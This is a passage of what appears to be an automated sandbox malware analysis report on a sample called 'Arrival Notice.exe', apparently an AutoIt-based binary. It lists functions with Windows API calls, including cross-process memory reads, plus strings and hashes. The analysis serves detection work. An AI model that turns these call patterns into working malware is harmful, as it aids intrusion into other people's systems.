                    • Part of subcall function 0041B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0041B3F8
                    • Part of subcall function 0041B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0041B355
                    • Part of subcall function 0041B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00412194,00000034,?,?,00001004,00000000,00000000), ref: 0041B365
                    • Part of subcall function 0041B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00412194,00000034,?,?,00001004,00000000,00000000), ref: 0041B37B
                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004127CD
                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0041281A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                  • String ID: @
                  • API String ID: 4150878124-2766056989
                  • Opcode ID: 5083d959ddba812b02ad5b16752e28367e7f15f22e8a8b4041f3b9b3725448b1
                  • Instruction ID: 9017d4f027ab0df49a891cdebb4932b2b0db607aa98ea734cc2ad6e4e57621ea
                  • Opcode Fuzzy Hash: 5083d959ddba812b02ad5b16752e28367e7f15f22e8a8b4041f3b9b3725448b1
                  • Instruction Fuzzy Hash: C6414F76900218BFDB11DFA4CD81ADEBBB8EF05304F00809AFA55B7181DB746E95CBA4
                  Function 003E172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Arrival Notice.exe,00000104), ref: 003E1769
                  • _free.LIBCMT ref: 003E1834
                  • _free.LIBCMT ref: 003E183E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Users\user\Desktop\Arrival Notice.exe
                  • API String ID: 2506810119-2828020761
                  • Opcode ID: b0639971a0e40a68aad22475cb0228ef8c5acb4c299f07f5421d81e5e97c8908
                  • Instruction ID: 3f7f0334f1af920a7a01c1af18c095143c35dae6ef8d99878712d887fc6e0286
                  • Opcode Fuzzy Hash: b0639971a0e40a68aad22475cb0228ef8c5acb4c299f07f5421d81e5e97c8908
                  • Instruction Fuzzy Hash: 72318475A002A8EFDB22DB9ADC81D9EBBFCEB85710B1542AAF80497251D7705E41CB90
                  Function 0041C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0041C306
                  • DeleteMenu.USER32(?,00000007,00000000), ref: 0041C34C
                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00481990,010E64B8), ref: 0041C395
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$Delete$InfoItem
                  • String ID: 0
                  • API String ID: 135850232-4108050209
                  • Opcode ID: 9f09d2916cc6d868b97206d66011aace8969535b3dc69afee5d0365198357237
                  • Instruction ID: 0d0e244f926e5e9f935b16b04d77d4a554f1e3108e5a830e583991cd344009b5
                  • Opcode Fuzzy Hash: 9f09d2916cc6d868b97206d66011aace8969535b3dc69afee5d0365198357237
                  • Instruction Fuzzy Hash: D541BF312843019FD720DF25DC84B9BBBE4AB85314F04861FF9A597391C734A945CB5A
                  Function 00444416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                  Download Yara Rule
                  APIs
                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0044CC08,00000000,?,?,?,?), ref: 004444AA
                  • GetWindowLongW.USER32 ref: 004444C7
                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004444D7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Long
                  • String ID: SysTreeView32
                  • API String ID: 847901565-1698111956
                  • Opcode ID: f06f19a5e849b9cd73362d03a628756f6c90220f83de1f2775c9857ca564dcde
                  • Instruction ID: 204ab44869b8b192dc392805f6477b852fff219d21c41bea110bf32ce8e0e194
                  • Opcode Fuzzy Hash: f06f19a5e849b9cd73362d03a628756f6c90220f83de1f2775c9857ca564dcde
                  • Instruction Fuzzy Hash: DA319E31200605ABEF219F38DC45BDB77A9EB48334F244726F975922D0D778AC509B54
                  Function 00416E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                  Download Yara Rule
                  APIs
                  • SysReAllocString.OLEAUT32(?,?), ref: 00416EED
                  • VariantCopyInd.OLEAUT32(?,?), ref: 00416F08
                  • VariantClear.OLEAUT32(?), ref: 00416F12
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$AllocClearCopyString
                  • String ID: *jA
                  • API String ID: 2173805711-1414719503
                  • Opcode ID: 68dc77ede5edc99018b13c89379cb3354182bd9745e25a6489f2e2e20fae9bbd
                  • Instruction ID: c7c8ceea2b023b83b5f95fb462ffd7335010a464f20d3fd6ca47b7cb95e9959b
                  • Opcode Fuzzy Hash: 68dc77ede5edc99018b13c89379cb3354182bd9745e25a6489f2e2e20fae9bbd
                  • Instruction Fuzzy Hash: 6631BE71704205DBCB05AFA4E8919FE77B9EF81304B1104AAF9064F2B1CB38D953CB99
                  Function 0043304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0043335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00433077,?,?), ref: 00433378
                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0043307A
                  • _wcslen.LIBCMT ref: 0043309B
                  • htons.WSOCK32(00000000,?,?,00000000), ref: 00433106
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                  • String ID: 255.255.255.255
                  • API String ID: 946324512-2422070025
                  • Opcode ID: 46e3197344bebe7d07c7ba8ec0ac73aac10025f9b04df2f74cc0dbaf150e744a
                  • Instruction ID: 7e63c2dcec8adac4048cbf1f8ba7ced947daa323b69105fab9e9f444e4238774
                  • Opcode Fuzzy Hash: 46e3197344bebe7d07c7ba8ec0ac73aac10025f9b04df2f74cc0dbaf150e744a
                  • Instruction Fuzzy Hash: E531D5396042019FCB14DF28C585EAA77F0EF18319F24909AE9158F392DB39EE41C765
                  Function 00444653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00444705
                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00444713
                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0044471A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$DestroyWindow
                  • String ID: msctls_updown32
                  • API String ID: 4014797782-2298589950
                  • Opcode ID: adde3fe6283e69f9fa645813519abaab3a64143c26a59bf3a0d703be3a4a0fa1
                  • Instruction ID: 606460b4299fe8305b500e6c37073f77089ea810f4634d19af0902805debb2f4
                  • Opcode Fuzzy Hash: adde3fe6283e69f9fa645813519abaab3a64143c26a59bf3a0d703be3a4a0fa1
                  • Instruction Fuzzy Hash: 112162B5600209AFEB11DF64DCC1DBB37ADEB9A354B05045AFA049B361CB34EC12CB64
                  Function 004195AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen
                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                  • API String ID: 176396367-2734436370
                  • Opcode ID: 5fa659b4986d113014a6eadab17326061ce2b4ad53d2c424823ee8358e6f7e55
                  • Instruction ID: 3d09f67b126d10d8f6808738ab9a5cbfc02ebd935057af18f7633f532268b2e0
                  • Opcode Fuzzy Hash: 5fa659b4986d113014a6eadab17326061ce2b4ad53d2c424823ee8358e6f7e55
                  • Instruction Fuzzy Hash: 27215B3310411066E332AB249C22FF773D9EFA1300F144027FA49AB241EB69ADD6C2AD
                  Function 004437B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00443840
                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00443850
                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00443876
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$MoveWindow
                  • String ID: Listbox
                  • API String ID: 3315199576-2633736733
                  • Opcode ID: 0bceb94b6557fdc4bc523be4476b696afa07fd46a89b40282fcd210dbe4ef933
                  • Instruction ID: f66532581a8507761d37d70d1596aafaca9ec17b41ca29802dba1b9e3a64ce34
                  • Opcode Fuzzy Hash: 0bceb94b6557fdc4bc523be4476b696afa07fd46a89b40282fcd210dbe4ef933
                  • Instruction Fuzzy Hash: 5221D472600118BBFF119F55CC81FBB77AEEF89B54F108126F9449B290C675DC5287A4
                  Function 004249F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 00424A08
                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00424A5C
                  • SetErrorMode.KERNEL32(00000000,?,?,0044CC08), ref: 00424AD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorMode$InformationVolume
                  • String ID: %lu
                  • API String ID: 2507767853-685833217
                  • Opcode ID: fd897fb20deab23e69b3af58ce1969e05dfca8d47d663adecbf930358f39fd52
                  • Instruction ID: b39a61bee2fabce8e4ff5b646d69aa84da20d51e106d05d81938a5ae9c9e7f47
                  • Opcode Fuzzy Hash: fd897fb20deab23e69b3af58ce1969e05dfca8d47d663adecbf930358f39fd52
                  • Instruction Fuzzy Hash: 71318E74A00108AFDB11DF54C881EAA7BF8EF49308F1480AAE909DF252D775ED45CB65
                  Function 004441EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0044424F
                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00444264
                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00444271
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID: msctls_trackbar32
                  • API String ID: 3850602802-1010561917
                  • Opcode ID: 82ea4a27812f916313de2a707c05e52d1297761c7c76226253cdd04dc6e969ef
                  • Instruction ID: 206b4fdcf2d039c43d8def9758d607189ed1cdae50fcdddee9b00cb886b2b599
                  • Opcode Fuzzy Hash: 82ea4a27812f916313de2a707c05e52d1297761c7c76226253cdd04dc6e969ef
                  • Instruction Fuzzy Hash: E4110A312402087EFF205F25CC06FAB3BACEFD5764F110525FA55E6190D6B5DC119714
                  Function 00412F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                    • Part of subcall function 00412DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00412DC5
                    • Part of subcall function 00412DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00412DD6
                    • Part of subcall function 00412DA7: GetCurrentThreadId.KERNEL32 ref: 00412DDD
                    • Part of subcall function 00412DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00412DE4
                  • GetFocus.USER32 ref: 00412F78
                    • Part of subcall function 00412DEE: GetParent.USER32(00000000), ref: 00412DF9
                  • GetClassNameW.USER32(?,?,00000100), ref: 00412FC3
                  • EnumChildWindows.USER32(?,0041303B), ref: 00412FEB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                  • String ID: %s%d
                  • API String ID: 1272988791-1110647743
                  • Opcode ID: 466423c643011cd8c9c81d0a6467e954477ae863046dae1f5f631a08951452e6
                  • Instruction ID: eb8491a2cbc133151f8a1f9dfb5cb4635c2c77b0f913c08b00dd6e82ac35793a
                  • Opcode Fuzzy Hash: 466423c643011cd8c9c81d0a6467e954477ae863046dae1f5f631a08951452e6
                  • Instruction Fuzzy Hash: A71105712002046BCF45BF61DCD6FEE37AAAF84308F04807AB909DB242DE7899858B74
                  Function 00445882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004458C1
                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004458EE
                  • DrawMenuBar.USER32(?), ref: 004458FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$InfoItem$Draw
                  • String ID: 0
                  • API String ID: 3227129158-4108050209
                  • Opcode ID: c81cb535981f1232d7fa9222255c34ea73aa7bc8a85cf39a314627b7e1767e5d
                  • Instruction ID: 25da78cc143c308332899e1143bf15a30f2e3352f222ba237107f0fcc56e9a4c
                  • Opcode Fuzzy Hash: c81cb535981f1232d7fa9222255c34ea73aa7bc8a85cf39a314627b7e1767e5d
                  • Instruction Fuzzy Hash: FA01A171500218EFEF119F21DC44BAFBBB5FB45760F0480AAE849DA252DB348A80DF25
                  Function 0040D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0040D3BF
                  • FreeLibrary.KERNEL32 ref: 0040D3E5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AddressFreeLibraryProc
                  • String ID: GetSystemWow64DirectoryW$X64
                  • API String ID: 3013587201-2590602151
                  • Opcode ID: 777b6a2b9d06d5be0bbb9cb09b322d8eb06c51a507393b0a7928d130c2d44976
                  • Instruction ID: c1ca791d7dfd7e91c5e2f731dc7049e6617ebb5e81f80b102e991389ea365894
                  • Opcode Fuzzy Hash: 777b6a2b9d06d5be0bbb9cb09b322d8eb06c51a507393b0a7928d130c2d44976
                  • Instruction Fuzzy Hash: 3CF0A765C06921DBD7B116504C94A5A7314AF11701B5895BFBC02F128CD73CCD498B9F
                  Function 0041007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4a29ff5fe1996b8088ccc027e7aead05a76282bd104343e363c9c59be8dd9a4d
                  • Instruction ID: 8fc5ea3cad2808170fe8f543b17610b3d538d7be0edad0fdeef7494f6f822d8c
                  • Opcode Fuzzy Hash: 4a29ff5fe1996b8088ccc027e7aead05a76282bd104343e363c9c59be8dd9a4d
                  • Instruction Fuzzy Hash: 1DC16C75A0020AEFCB14CFA4C894AAEB7B5FF48304F10859AE915EB251D775EDC2CB94
                  Function 0043342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearInitInitializeUninitialize
                  • String ID:
                  • API String ID: 1998397398-0
                  • Opcode ID: e526cb0e4c9bf710a7ef4ebf3db40fa465c00af9b5e2b246e46d7305230c427c
                  • Instruction ID: 4b657d24b47ef71b9dc5b3d675f06c4c89db5541ce42070f90344a323f86ce4f
                  • Opcode Fuzzy Hash: e526cb0e4c9bf710a7ef4ebf3db40fa465c00af9b5e2b246e46d7305230c427c
                  • Instruction Fuzzy Hash: 89A159756042009FC711DF28C486A6AB7E5FF8D715F04885EF98A9B362DB34EE01CB96
                  Function 00410436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                  Download Yara Rule
                  APIs
                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0044FC08,?), ref: 004105F0
                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0044FC08,?), ref: 00410608
                  • CLSIDFromProgID.OLE32(?,?,00000000,0044CC40,000000FF,?,00000000,00000800,00000000,?,0044FC08,?), ref: 0041062D
                  • _memcmp.LIBVCRUNTIME ref: 0041064E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FromProg$FreeTask_memcmp
                  • String ID:
